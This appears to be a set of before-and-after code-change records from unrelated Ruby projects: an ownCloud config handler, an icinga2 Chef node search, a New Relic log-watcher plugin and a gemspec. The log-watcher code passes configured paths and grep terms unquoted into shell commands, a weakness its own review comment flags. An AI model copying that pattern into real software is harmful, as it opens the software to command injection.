    # file - path to ownCloud's config.php
    def initialize(file)
      @file = file
      @options = Hash.new
      @original_options = Hash.new
      read
    end

    # Merge new options into the current configuration (ignored unless a Hash).
    def merge(new_options)
      @options.merge!(new_options) if new_options.kind_of?(Hash)
    end

    # Load the current config by asking PHP to render $CONFIG as JSON.
    # No-op when the file does not exist yet.
    def read()
      begin
        return unless ::File.exist?(@file) # File.exists? is deprecated
        f = IO.popen('php', 'r+')
        f.write "<?php require('#{@file}'); echo json_encode($CONFIG);"
        f.close_write
        data = f.read
        f.close
        @options = JSON.parse(data)
        @original_options = @options.clone
      rescue StandardError => e
        # StandardError, not Exception: don't swallow SignalException/SystemExit.
        Chef::Application.fatal!("Error reading OwnCloud config: #{e.message}")
      end
    end

    # Persist the config when it changed, asking PHP to convert the JSON
    # back into native PHP syntax via var_export.
    def write()
      begin
        return if @options == @original_options
        f = IO.popen('php', 'r+')
        # Escape backslashes and single quotes so the JSON survives being
        # embedded in a single-quoted PHP string literal. The original
        # interpolated the JSON verbatim, which broke (or allowed PHP
        # injection) for any value containing a quote.
        json = @options.to_json.gsub('\\') { '\\\\' }.gsub("'") { "\\'" }
        f.write "<?php var_export(json_decode('#{json}', true));"
        f.close_write
        data = f.read
        f.close
        IO.write(@file, "<?php\n$CONFIG = #{data};\n")
        Chef::Log.info("OwnCloud config written")
      rescue StandardError => e
        Chef::Application.fatal!("Error writing OwnCloud config: #{e.message}")
      end
    end
  end
end
|
#
# Cookbook Name:: icinga2
# Recipe:: search
#
# Copyright 2014, Virender Khatri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef'
require 'chef/node'
require 'chef/rest'
require 'chef/role'
require 'chef/environment'
require 'chef/data_bag'
require 'chef/data_bag_item'
require 'resolv'
module Icinga2
# fetch node information into Hash
class Search
attr_accessor :query, :environment, :enable_cluster_hostgroup, :cluster_attribute,
:enable_application_hostgroup, :application_attribute, :ignore_node_error,
:ignore_resolv_error, :exclude_recipes, :exclude_roles, :env_custom_vars,
:limit_region, :server_region, :search_pattern, :use_fqdn_resolv,
:add_cloud_custom_vars,
:env_filter_node_vars, :failover_fqdn_address
# options - Hash of search configuration supplied by the icinga2
# cookbook; each recognised key is copied onto the same-named
# attr_accessor, and the full Hash is retained as @query.
def initialize(options = {})
@query = options
@environment = options[:environment]
@enable_cluster_hostgroup = options[:enable_cluster_hostgroup]
@cluster_attribute = options[:cluster_attribute]
@enable_application_hostgroup = options[:enable_application_hostgroup]
@application_attribute = options[:application_attribute]
@ignore_node_error = options[:ignore_node_error]
@ignore_resolv_error = options[:ignore_resolv_error]
@exclude_recipes = options[:exclude_recipes]
@exclude_roles = options[:exclude_roles]
@env_custom_vars = options[:env_custom_vars]
@limit_region = options[:limit_region]
@server_region = options[:server_region]
@search_pattern = options[:search_pattern]
@use_fqdn_resolv = options[:use_fqdn_resolv]
@add_cloud_custom_vars = options[:add_cloud_custom_vars]
@env_filter_node_vars = options[:env_filter_node_vars]
@failover_fqdn_address = options[:failover_fqdn_address]
end
# Resolve fqdn to an IP address string, or false when resolution fails.
def fqdn_resolv(fqdn)
  Resolv.getaddress(fqdn)
rescue StandardError
  false
end
# True when var stringifies to non-empty content; false for nil/""/[].
# Replaces the redundant `cond ? false : true` ternary with a plain
# boolean expression.
def variable_check(var)
  !var.to_s.empty?
end
# Run the configured Chef node search (search_pattern) and convert the
# results into the nodes/recipes/roles/clusters/applications summary.
def environment_resources
s = Chef::Search::Query.new
results = s.search('node', search_pattern)[0]
convert_resources(results)
end
# Convert Chef search results into a summary Hash with keys 'nodes',
# 'recipes', 'roles', 'clusters' and 'applications'. Nodes failing the
# env filter / monitoring_off / region / fqdn-resolution / validation
# checks are skipped according to the configured options.
def convert_resources(results)
  nodes = {}
  clusters = []
  applications = []
  roles = []
  recipes = []
  results.each do |node|
    node_hash = convert_node(node)
    # match node attributes to given env attributes.
    # BUG FIX: the original issued `next` from inside the inner #each
    # block, which only advanced the inner (filter-key) iteration — the
    # node was warned about as "ignored" but still processed. Detect the
    # first mismatch, then skip the node at this loop level.
    bad_key, = env_filter_node_vars.find { |k, v| node_hash[k] != v }
    if bad_key
      Chef::Log.warn("node#{bad_key}=#{node_hash[bad_key]} does not match with env_filter_node_vars[#{bad_key}]=#{env_filter_node_vars[bad_key]}, node ignored")
      next
    end
    # skip node if set not to monitor
    if node['monitoring_off'] == true
      Chef::Log.warn("#{node_hash['name']} is set to turn off the monitoring, node ignored")
      next
    end
    # check server region with node region
    if limit_region && server_region
      # skip region check if node_region value is not present
      if variable_check(node_hash['node_region'])
        # skip node if server and node region does not match
        next unless server_region == node_hash['node_region']
      end
    end
    # skip node if unable to resolv node fqdn
    unless node_hash['address']
      unless ignore_resolv_error
        Chef::Log.warn("#{node_hash['name']} unable to resolv fqdn, node ignored")
        next
      end
    end
    # skip node if recipe/role to be excluded
    # code here
    begin
      # check node attributes
      validate_node(node_hash)
    rescue => error
      # ignore node if unable to determine all attributes
      unless ignore_node_error
        Chef::Log.warn("#{error.message}, node ignored")
        next
      end
    end
    # collect node roles / recipes
    roles += node_hash['roles']
    recipes += node_hash['recipes']
    if node_hash['custom_vars'].key?('hostgroups')
      if node_hash['custom_vars']['hostgroups'].is_a?(Array)
        node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment']
      else
        fail "node 'hostgroups' must be defined as an Array of HostGroup name (node['icinga2']['client']['custom_vars']['hostgroups'])"
      end
    else
      node_hash['custom_vars']['hostgroups'] = [node_hash['chef_environment']]
    end
    # collect nodes cluster
    if variable_check(node_hash[cluster_attribute]) && enable_cluster_hostgroup
      clusters.push node_hash[cluster_attribute]
      node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[cluster_attribute]
    end
    # collect node application types
    if node_hash[application_attribute].is_a?(Array) && enable_application_hostgroup
      applications += node_hash[application_attribute].uniq
      node_hash[application_attribute].uniq.each do |a|
        node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + a if variable_check(a)
      end
    elsif node_hash[application_attribute].is_a?(String) && variable_check(node_hash[application_attribute]) && enable_application_hostgroup
      applications.push node_hash[application_attribute]
      node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[application_attribute]
    end
    node_hash['custom_vars']['hostgroups'].uniq!
    # need to verify whether we need hostgroups for node
    # node_hash['hostgroups'] = node_hash['custom_vars']['hostgroups']
    nodes[node_hash['fqdn']] = node_hash
  end
  { 'nodes' => nodes, 'recipes' => recipes.sort.uniq, 'roles' => roles.sort.uniq, 'clusters' => clusters.sort.uniq, 'applications' => applications.sort.uniq }
end
# Flatten a Chef::Node into the plain Hash consumed by convert_resources,
# including icinga2 custom_vars, optional cluster/application attributes
# and (for EC2 nodes) cloud metadata.
# NOTE(review): assumes ohai populated node['cpu']['total'],
# node['memory'] and node['filesystem'] — raises otherwise; confirm
# against minimal/containerised nodes.
def convert_node(node)
# prepare Node Hash object
node_hash = {}
node_hash['name'] = node.name
if use_fqdn_resolv
# lookup ip address from node fqdn
node_hash['address'] = fqdn_resolv(node_hash['name'])
node_hash['address'] = node['ipaddress'] if failover_fqdn_address && !node_hash['address']
else
node_hash['address'] = node['ipaddress']
end
node_hash['address6'] = node['ip6address']
node_hash['chef_environment'] = node.chef_environment
node_hash['environment'] = node.chef_environment
node_hash['run_list'] = node.run_list
node_hash['recipes'] = !node.run_list.nil? ? node.run_list.recipes : []
node_hash['roles'] = !node.run_list.nil? ? node.run_list.roles : []
node_hash['fqdn'] = node['fqdn']
node_hash['hostname'] = node['hostname']
node_hash['kernel_machine'] = !node['kernel'].nil? ? node['kernel']['machine'] : nil
node_hash['kernel_os'] = !node['kernel'].nil? ? node['kernel']['os'] : nil
node_hash['os'] = node['os']
node_hash['platform'] = node['platform']
node_hash['platform_version'] = node['platform_version']
node_hash['tags'] = node['tags']
# keep only real block devices, excluding swap
node_hash['disks'] = node['filesystem'].map { |d, o| d if d.to_s =~ /^\/dev/ && o['fs_type'] != 'swap' }.compact
node_hash['custom_vars'] = node_custom_vars(node['icinga2'])
# chef client last run
# node_hash['last_known_run'] = Time.at(node.automatic['ohai_time'])
# not required, keeping it for the moment
node_hash['custom_vars']['tags'] = node_hash['tags']
node_hash['custom_vars']['disks'] = node_hash['disks']
# add default chef attributes
node_hash['custom_vars']['platform'] = node_hash['platform']
node_hash['custom_vars']['platform_version'] = node_hash['platform_version']
node_hash['custom_vars']['cpu'] = node['cpu']['total']
if node['memory']['total']
node_hash['custom_vars']['memory'] = (node['memory']['total'].gsub(/\D/, '').to_i / 1024).to_s + 'MB'
end
node_hash['custom_vars']['environment'] = node_hash['chef_environment']
node_hash['custom_vars']['run_list'] = node_hash['run_list'].to_s
if enable_cluster_hostgroup && cluster_attribute
node_hash[cluster_attribute] = node[cluster_attribute.to_sym].to_s
node_hash['custom_vars'][cluster_attribute] = node_hash[cluster_attribute].to_s
end
if enable_application_hostgroup && application_attribute
node_hash[application_attribute] = node[application_attribute] || []
node_hash['custom_vars'][application_attribute] = node_hash[application_attribute] || []
end
if add_cloud_custom_vars
if node.key?('ec2')
# availability zone minus its trailing letter is the region
node_hash['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_id'] = node['ec2']['instance_id']
node_hash['custom_vars']['node_type'] = node['ec2']['instance_type']
node_hash['custom_vars']['node_zone'] = node['ec2']['placement_availability_zone']
node_hash['custom_vars']['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_security_groups'] = node['ec2']['security_groups']
node_hash['custom_vars']['node_wan_address'] = node['ec2']['public_ipv4'].to_s
# take the VPC CIDR of the first network interface only
node['ec2']['network_interfaces_macs'].each do |_net, net_options|
node_hash['custom_vars']['node_vpc_cidr'] = net_options['vpc_ipv4_cidr_block'].to_s
break
end
else
# check for other cloud providers
node_hash['node_region'] = nil
end
end
# add node custom vars from environment lwrp
env_custom_vars.each do |k, v|
node_hash['custom_vars'][k] = v if variable_check(k)
end
node_hash
end
# Extract the icinga2 client custom_vars Hash from node attributes;
# returns {} when the attribute tree is absent or not a Hash.
def node_custom_vars(vars)
  custom_vars = {}
  if vars && vars.key?('client')
    client = vars['client']
    if client.key?('custom_vars') && client['custom_vars'].is_a?(Hash)
      custom_vars = client['custom_vars'].to_hash
    end
  end
  custom_vars
end
# Ensure the converted node Hash carries every attribute icinga2 needs;
# raises ArgumentError naming the first missing attribute.
def validate_node(node_hash)
  %w(chef_environment fqdn hostname).each do |attr|
    fail ArgumentError, "#{node_hash['name']} missing '#{attr}'" unless node_hash[attr]
  end
  nil
end
end
end
add only mount point devices
#
# Cookbook Name:: icinga2
# Recipe:: search
#
# Copyright 2014, Virender Khatri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef'
require 'chef/node'
require 'chef/rest'
require 'chef/role'
require 'chef/environment'
require 'chef/data_bag'
require 'chef/data_bag_item'
require 'resolv'
module Icinga2
  # Converts Chef node search results into plain Hash structures that are
  # used to build Icinga2 host and hostgroup objects for an environment.
  class Search
    attr_accessor :query, :environment, :enable_cluster_hostgroup, :cluster_attribute,
                  :enable_application_hostgroup, :application_attribute, :ignore_node_error,
                  :ignore_resolv_error, :exclude_recipes, :exclude_roles, :env_custom_vars,
                  :limit_region, :server_region, :search_pattern, :use_fqdn_resolv,
                  :add_cloud_custom_vars,
                  :env_filter_node_vars, :failover_fqdn_address

    # options - Hash of search/conversion settings; see the attr_accessor
    # list above for the recognized keys. Missing keys default to nil.
    def initialize(options = {})
      @query = options
      @environment = options[:environment]
      @enable_cluster_hostgroup = options[:enable_cluster_hostgroup]
      @cluster_attribute = options[:cluster_attribute]
      @enable_application_hostgroup = options[:enable_application_hostgroup]
      @application_attribute = options[:application_attribute]
      @ignore_node_error = options[:ignore_node_error]
      @ignore_resolv_error = options[:ignore_resolv_error]
      @exclude_recipes = options[:exclude_recipes]
      @exclude_roles = options[:exclude_roles]
      @env_custom_vars = options[:env_custom_vars]
      @limit_region = options[:limit_region]
      @server_region = options[:server_region]
      @search_pattern = options[:search_pattern]
      @use_fqdn_resolv = options[:use_fqdn_resolv]
      @add_cloud_custom_vars = options[:add_cloud_custom_vars]
      @env_filter_node_vars = options[:env_filter_node_vars]
      @failover_fqdn_address = options[:failover_fqdn_address]
    end

    # Resolves +fqdn+ to an IP address string, or returns +false+ when
    # resolution fails (best effort -- callers decide whether that is fatal).
    def fqdn_resolv(fqdn)
      Resolv.getaddress(fqdn)
    rescue
      false
    end

    # True when +var+ stringifies to a non-empty value.
    def variable_check(var)
      !var.to_s.empty?
    end

    # Runs the Chef node search with +search_pattern+ and converts the
    # result set; returns the summary Hash from #convert_resources.
    def environment_resources
      s = Chef::Search::Query.new
      results = s.search('node', search_pattern)[0]
      convert_resources(results)
    end

    # Converts search +results+ (Chef::Node objects) into
    # { 'nodes' => {fqdn => node_hash}, 'recipes' => [...], 'roles' => [...],
    #   'clusters' => [...], 'applications' => [...] }.
    # Nodes may be skipped for: env filter mismatch, monitoring_off, region
    # mismatch, unresolvable fqdn, or failed attribute validation.
    def convert_resources(results)
      nodes = {}
      clusters = []
      applications = []
      roles = []
      recipes = []
      results.each do |node|
        node_hash = convert_node(node)
        # match node attributes to given env attributes.
        # BUG FIX: the previous implementation used `next` inside an inner
        # `each` block, which only skipped the filter iteration and never the
        # node itself, making the filter a no-op despite logging "node ignored".
        mismatch = (env_filter_node_vars || {}).detect { |k, v| node_hash[k] != v }
        if mismatch
          k, = mismatch
          Chef::Log.warn("node#{k}=#{node_hash[k]} does not match with env_filter_node_vars[#{k}]=#{env_filter_node_vars[k]}, node ignored")
          next
        end
        # skip node if set not to monitor
        if node['monitoring_off'] == true
          Chef::Log.warn("#{node_hash['name']} is set to turn off the monitoring, node ignored")
          next
        end
        # check server region with node region
        if limit_region && server_region
          # skip region check if node_region value is not present
          if variable_check(node_hash['node_region'])
            # skip node if server and node region does not match
            next unless server_region == node_hash['node_region']
          end
        end
        # skip node if unable to resolv node fqdn
        unless node_hash['address']
          unless ignore_resolv_error
            Chef::Log.warn("#{node_hash['name']} unable to resolv fqdn, node ignored")
            next
          end
        end
        # skip node if recipe/role to be excluded
        # code here
        begin
          # check node attributes
          validate_node(node_hash)
        rescue => error
          # ignore node if unable to determine all attributes
          unless ignore_node_error
            Chef::Log.warn("#{error.message}, node ignored")
            next
          end
        end
        # collect node roles / recipes
        roles += node_hash['roles']
        recipes += node_hash['recipes']
        if node_hash['custom_vars'].key?('hostgroups')
          if node_hash['custom_vars']['hostgroups'].is_a?(Array)
            node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment']
          else
            fail "node 'hostgroups' must be defined as an Array of HostGroup name (node['icinga2']['client']['custom_vars']['hostgroups'])"
          end
        else
          node_hash['custom_vars']['hostgroups'] = [node_hash['chef_environment']]
        end
        # collect nodes cluster
        if variable_check(node_hash[cluster_attribute]) && enable_cluster_hostgroup
          clusters.push node_hash[cluster_attribute]
          node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[cluster_attribute]
        end
        # collect node application types
        if node_hash[application_attribute].is_a?(Array) && enable_application_hostgroup
          applications += node_hash[application_attribute].uniq
          node_hash[application_attribute].uniq.each do |a|
            node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + a if variable_check(a)
          end
        elsif node_hash[application_attribute].is_a?(String) && variable_check(node_hash[application_attribute]) && enable_application_hostgroup
          applications.push node_hash[application_attribute]
          node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[application_attribute]
        end
        node_hash['custom_vars']['hostgroups'].uniq!
        # need to verify whether we need hostgroups for node
        # node_hash['hostgroups'] = node_hash['custom_vars']['hostgroups']
        nodes[node_hash['fqdn']] = node_hash
      end
      { 'nodes' => nodes, 'recipes' => recipes.sort.uniq, 'roles' => roles.sort.uniq, 'clusters' => clusters.sort.uniq, 'applications' => applications.sort.uniq }
    end

    # Flattens a single Chef::Node into a plain Hash: identity, address
    # (resolved or failover), run list, platform facts, and 'custom_vars'
    # merged from the node's icinga2 client attributes, cloud (EC2) metadata
    # and the environment-level env_custom_vars.
    def convert_node(node)
      # prepare Node Hash object
      node_hash = {}
      node_hash['name'] = node.name
      if use_fqdn_resolv
        # lookup ip address from node fqdn; optionally fall back to ohai's ipaddress
        node_hash['address'] = fqdn_resolv(node_hash['name'])
        node_hash['address'] = node['ipaddress'] if failover_fqdn_address && !node_hash['address']
      else
        node_hash['address'] = node['ipaddress']
      end
      node_hash['address6'] = node['ip6address']
      node_hash['chef_environment'] = node.chef_environment
      node_hash['environment'] = node.chef_environment
      node_hash['run_list'] = node.run_list
      node_hash['recipes'] = !node.run_list.nil? ? node.run_list.recipes : []
      node_hash['roles'] = !node.run_list.nil? ? node.run_list.roles : []
      node_hash['fqdn'] = node['fqdn']
      node_hash['hostname'] = node['hostname']
      node_hash['kernel_machine'] = !node['kernel'].nil? ? node['kernel']['machine'] : nil
      node_hash['kernel_os'] = !node['kernel'].nil? ? node['kernel']['os'] : nil
      node_hash['os'] = node['os']
      node_hash['platform'] = node['platform']
      node_hash['platform_version'] = node['platform_version']
      node_hash['tags'] = node['tags']
      # mounted /dev/* filesystems, excluding swap
      node_hash['disks'] = node['filesystem'].map { |d, o| d if d.to_s =~ /^\/dev/ && o['fs_type'] != 'swap' && o.key?('mount') }.compact
      node_hash['custom_vars'] = node_custom_vars(node['icinga2'])
      # chef client last run
      # node_hash['last_known_run'] = Time.at(node.automatic['ohai_time'])
      # not required, keeping it for the moment
      node_hash['custom_vars']['tags'] = node_hash['tags']
      node_hash['custom_vars']['disks'] = node_hash['disks']
      # add default chef attributes
      node_hash['custom_vars']['platform'] = node_hash['platform']
      node_hash['custom_vars']['platform_version'] = node_hash['platform_version']
      node_hash['custom_vars']['cpu'] = node['cpu']['total']
      if node['memory']['total']
        # ohai reports e.g. "2048256kB"; strip the unit and convert to MB
        node_hash['custom_vars']['memory'] = (node['memory']['total'].gsub(/\D/, '').to_i / 1024).to_s + 'MB'
      end
      node_hash['custom_vars']['environment'] = node_hash['chef_environment']
      node_hash['custom_vars']['run_list'] = node_hash['run_list'].to_s
      if enable_cluster_hostgroup && cluster_attribute
        node_hash[cluster_attribute] = node[cluster_attribute.to_sym].to_s
        node_hash['custom_vars'][cluster_attribute] = node_hash[cluster_attribute].to_s
      end
      if enable_application_hostgroup && application_attribute
        node_hash[application_attribute] = node[application_attribute] || []
        node_hash['custom_vars'][application_attribute] = node_hash[application_attribute] || []
      end
      if add_cloud_custom_vars
        if node.key?('ec2')
          # availability zone minus its trailing letter is the region
          node_hash['node_region'] = node['ec2']['placement_availability_zone'].chop
          node_hash['custom_vars']['node_id'] = node['ec2']['instance_id']
          node_hash['custom_vars']['node_type'] = node['ec2']['instance_type']
          node_hash['custom_vars']['node_zone'] = node['ec2']['placement_availability_zone']
          node_hash['custom_vars']['node_region'] = node['ec2']['placement_availability_zone'].chop
          node_hash['custom_vars']['node_security_groups'] = node['ec2']['security_groups']
          node_hash['custom_vars']['node_wan_address'] = node['ec2']['public_ipv4'].to_s
          # only the first interface's VPC CIDR is recorded
          node['ec2']['network_interfaces_macs'].each do |_net, net_options|
            node_hash['custom_vars']['node_vpc_cidr'] = net_options['vpc_ipv4_cidr_block'].to_s
            break
          end
        else
          # check for other cloud providers
          node_hash['node_region'] = nil
        end
      end
      # add node custom vars from environment lwrp
      (env_custom_vars || {}).each do |k, v|
        node_hash['custom_vars'][k] = v if variable_check(k)
      end
      node_hash
    end

    # Extracts node['icinga2']['client']['custom_vars'] as a plain Hash;
    # returns {} when absent or not a Hash.
    def node_custom_vars(vars)
      custom_vars = {}
      # add icinga2 host custom vars from node custom_vars
      if vars && vars.key?('client')
        if vars['client'].key?('custom_vars') && vars['client']['custom_vars'].is_a?(Hash)
          custom_vars = vars['client']['custom_vars'].to_hash
        end
      end
      custom_vars
    end

    # Raises ArgumentError unless the node hash carries the attributes
    # required to build an Icinga2 host object.
    def validate_node(node_hash)
      fail ArgumentError, "#{node_hash['name']} missing 'chef_environment'" unless node_hash['chef_environment']
      fail ArgumentError, "#{node_hash['name']} missing 'fqdn'" unless node_hash['fqdn']
      fail ArgumentError, "#{node_hash['name']} missing 'hostname'" unless node_hash['hostname']
    end
  end
end
|
#!/usr/bin/env ruby
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "git@github.com:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# logwatcher:
# # Full path to the the log file
# log_path: tmp.log
# # Returns the number of matches for this term. Use Linux Regex formatting.
# # Default: "[Ee]rror"
# term: "[Ee]rror"
# # Provide any options to pass to grep when running.
# # For example, to count non-matching lines, enter 'v'.
# # Use the abbreviated format ('v' and not 'invert-match').
# grep_options:
#
#
module NewRelic::Processor
  # Turns the absolute value reported at each poll into a per-second rate.
  class DiffRate < NewRelic::Plugin::Processor::Base
    def initialize
      super :diff_rate, "DiffRate"
    end

    # Returns +val+ divided by the seconds elapsed since the previous call,
    # or nil on the first call (no earlier timestamp to measure against).
    def process(val)
      value = val.to_f
      now = Time.now
      rate = nil
      rate = value / (now - @last_time).to_f if @last_time && now > @last_time
      @last_value = value
      @last_time = now
      rate
    end
  end
end
module LogwatcherAgent
  # New Relic plugin agent that watches a log file between polls and reports
  # the rate of newly appended lines matching a configurable grep term.
  class Agent < NewRelic::Plugin::Agent::Base
    agent_guid "DROP_GUID_FROM_PLUGIN_HERE"
    # Configured via newrelic_plugin.yml: log_path, term, grep_options.
    agent_config_options :log_path, :term, :grep_options
    agent_human_labels("Logwatcher") { "#{log_path}" }

    # Called once at startup; prepares the rate processor for match counts.
    def setup_metrics
      @occurances=NewRelic::Processor::DiffRate.new
    end

    # Called every poll interval: measures how much the file grew since the
    # previous poll and greps only the newly appended bytes for the term.
    # NOTE(review): log_path and term are interpolated into shell commands
    # unquoted -- paths/terms with spaces or shell metacharacters would break
    # or be unsafe; confirm the config source is trusted.
    def poll_cycle
      check_params
      @last_length ||= 0
      # current size of the log file in bytes (via `wc -c`)
      current_length = `wc -c #{log_path}`.split(' ')[0].to_i
      count = 0
      # don't run it the first time
      if (@last_length > 0 )
        read_length = current_length - @last_length
        # Check to see if this file was rotated. This occurs when the +current_length+ is less than
        # the +last_run+. Don't return a count if this occured.
        if read_length >= 0
          # finds new content from +last_length+ to the end of the file, then just extracts from the recorded
          # +read_length+. This ignores new lines that are added after finding the +current_length+. Those lines
          # will be read on the next run.
          count = `tail -c +#{@last_length+1} #{log_path} | head -c #{read_length} | grep "#{term}" -#{grep_options.to_s.gsub('-','')}c`.strip.to_f
        end
      end
      report_metric("Matches/Total", "Occurances", @occurances.process(count)) if count
      @last_length = current_length
    end

    private

    # Grep term to count; defaults to a case-tolerant "error".
    def term
      @term || "[Ee]rror"
    end

    # Validates configuration: non-empty log path that exists on disk and a
    # non-empty term. Raises RuntimeError with a descriptive message otherwise.
    def check_params
      @log_path = log_path.to_s.strip
      if log_path.empty?
        raise( "Please provide a path to the log file." )
      end
      # existence check via the shell `test` builtin; $? carries its status
      `test -e #{log_path}`
      unless $?.success?
        raise("Could not find the log file. The log file could not be found at: #{log_path}. Please ensure the full path is correct.")
      end
      @term = term.to_s.strip
      if term.empty?
        raise( "The term cannot be empty" )
      end
    end
  end

  # Register and launch the agent (setup_and_run never returns).
  NewRelic::Plugin::Setup.install_agent :logwatcher, LogwatcherAgent
  #
  # Launch the agent (never returns)
  #
  NewRelic::Plugin::Run.setup_and_run
end
Description for logwatcher_agent
#!/usr/bin/env ruby
# Monitors a given log file, reporting the rate of occurrences of a provided term. It’s the perfect plugin for error tracking.
#
# Compatibility
# -------------
# Requires the tail, grep, and wc commands.
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "git@github.com:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# logwatcher:
# # Full path to the the log file
# log_path: tmp.log
# # Returns the number of matches for this term. Use Linux Regex formatting.
# # Default: "[Ee]rror"
# term: "[Ee]rror"
# # Provide any options to pass to grep when running.
# # For example, to count non-matching lines, enter 'v'.
# # Use the abbreviated format ('v' and not 'invert-match').
# grep_options:
#
#
module NewRelic::Processor
  # Turns the absolute value reported at each poll into a per-second rate.
  class DiffRate < NewRelic::Plugin::Processor::Base
    def initialize
      super :diff_rate, "DiffRate"
    end

    # Returns +val+ divided by the seconds elapsed since the previous call,
    # or nil on the first call (no earlier timestamp to measure against).
    def process(val)
      value = val.to_f
      now = Time.now
      rate = nil
      rate = value / (now - @last_time).to_f if @last_time && now > @last_time
      @last_value = value
      @last_time = now
      rate
    end
  end
end
module LogwatcherAgent
  # New Relic plugin agent that watches a log file between polls and reports
  # the rate of newly appended lines matching a configurable grep term.
  class Agent < NewRelic::Plugin::Agent::Base
    agent_guid "DROP_GUID_FROM_PLUGIN_HERE"
    # Configured via newrelic_plugin.yml: log_path, term, grep_options.
    agent_config_options :log_path, :term, :grep_options
    agent_human_labels("Logwatcher") { "#{log_path}" }

    # Called once at startup; prepares the rate processor for match counts.
    def setup_metrics
      @occurances=NewRelic::Processor::DiffRate.new
    end

    # Called every poll interval: measures how much the file grew since the
    # previous poll and greps only the newly appended bytes for the term.
    # NOTE(review): log_path and term are interpolated into shell commands
    # unquoted -- paths/terms with spaces or shell metacharacters would break
    # or be unsafe; confirm the config source is trusted.
    def poll_cycle
      check_params
      @last_length ||= 0
      # current size of the log file in bytes (via `wc -c`)
      current_length = `wc -c #{log_path}`.split(' ')[0].to_i
      count = 0
      # don't run it the first time
      if (@last_length > 0 )
        read_length = current_length - @last_length
        # Check to see if this file was rotated. This occurs when the +current_length+ is less than
        # the +last_run+. Don't return a count if this occured.
        if read_length >= 0
          # finds new content from +last_length+ to the end of the file, then just extracts from the recorded
          # +read_length+. This ignores new lines that are added after finding the +current_length+. Those lines
          # will be read on the next run.
          count = `tail -c +#{@last_length+1} #{log_path} | head -c #{read_length} | grep "#{term}" -#{grep_options.to_s.gsub('-','')}c`.strip.to_f
        end
      end
      report_metric("Matches/Total", "Occurances", @occurances.process(count)) if count
      @last_length = current_length
    end

    private

    # Grep term to count; defaults to a case-tolerant "error".
    def term
      @term || "[Ee]rror"
    end

    # Validates configuration: non-empty log path that exists on disk and a
    # non-empty term. Raises RuntimeError with a descriptive message otherwise.
    def check_params
      @log_path = log_path.to_s.strip
      if log_path.empty?
        raise( "Please provide a path to the log file." )
      end
      # existence check via the shell `test` builtin; $? carries its status
      `test -e #{log_path}`
      unless $?.success?
        raise("Could not find the log file. The log file could not be found at: #{log_path}. Please ensure the full path is correct.")
      end
      @term = term.to_s.strip
      if term.empty?
        raise( "The term cannot be empty" )
      end
    end
  end

  # Register and launch the agent (setup_and_run never returns).
  NewRelic::Plugin::Setup.install_agent :logwatcher, LogwatcherAgent
  #
  # Launch the agent (never returns)
  #
  NewRelic::Plugin::Run.setup_and_run
end
|
# coding: utf-8
# Gem packaging metadata for ltsv_logger.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'ltsv_logger/version'

Gem::Specification.new do |s|
  s.name          = "ltsv_logger"
  s.version       = LtsvLogger::VERSION
  s.authors       = ["Yuya.Nishida."]
  s.email         = ["yuya@j96.org"]
  s.description   = %q{TODO: Write a gem description}
  s.summary       = %q{TODO: Write a gem summary}
  s.homepage      = ""
  s.license       = "MIT"

  # Package everything tracked by git; executables come from bin/.
  s.files         = `git ls-files`.split($/)
  s.executables   = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
  s.test_files    = s.files.grep(%r{^(test|spec|features)/})
  s.require_paths = ["lib"]

  s.add_development_dependency "bundler", "~> 1.3"
  s.add_development_dependency "rake"
end
Implement the gem: replace the placeholder metadata (description, summary, homepage, license) with real values and declare the ltsv runtime dependency.
# coding: utf-8
# Gem packaging metadata for ltsv_logger.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "ltsv_logger"

Gem::Specification.new do |s|
  s.name          = "ltsv_logger"
  s.version       = LtsvLogger::VERSION
  s.authors       = ["Yuya.Nishida."]
  s.email         = ["yuya@j96.org"]
  s.description   = "A logger implementation for LTSV format"
  s.summary       = "A logger implementation for LTSV format"
  s.homepage      = "https://github.com/nishidayuya/ltsv_logger"
  s.license       = "X11"

  # Package everything tracked by git; executables come from bin/.
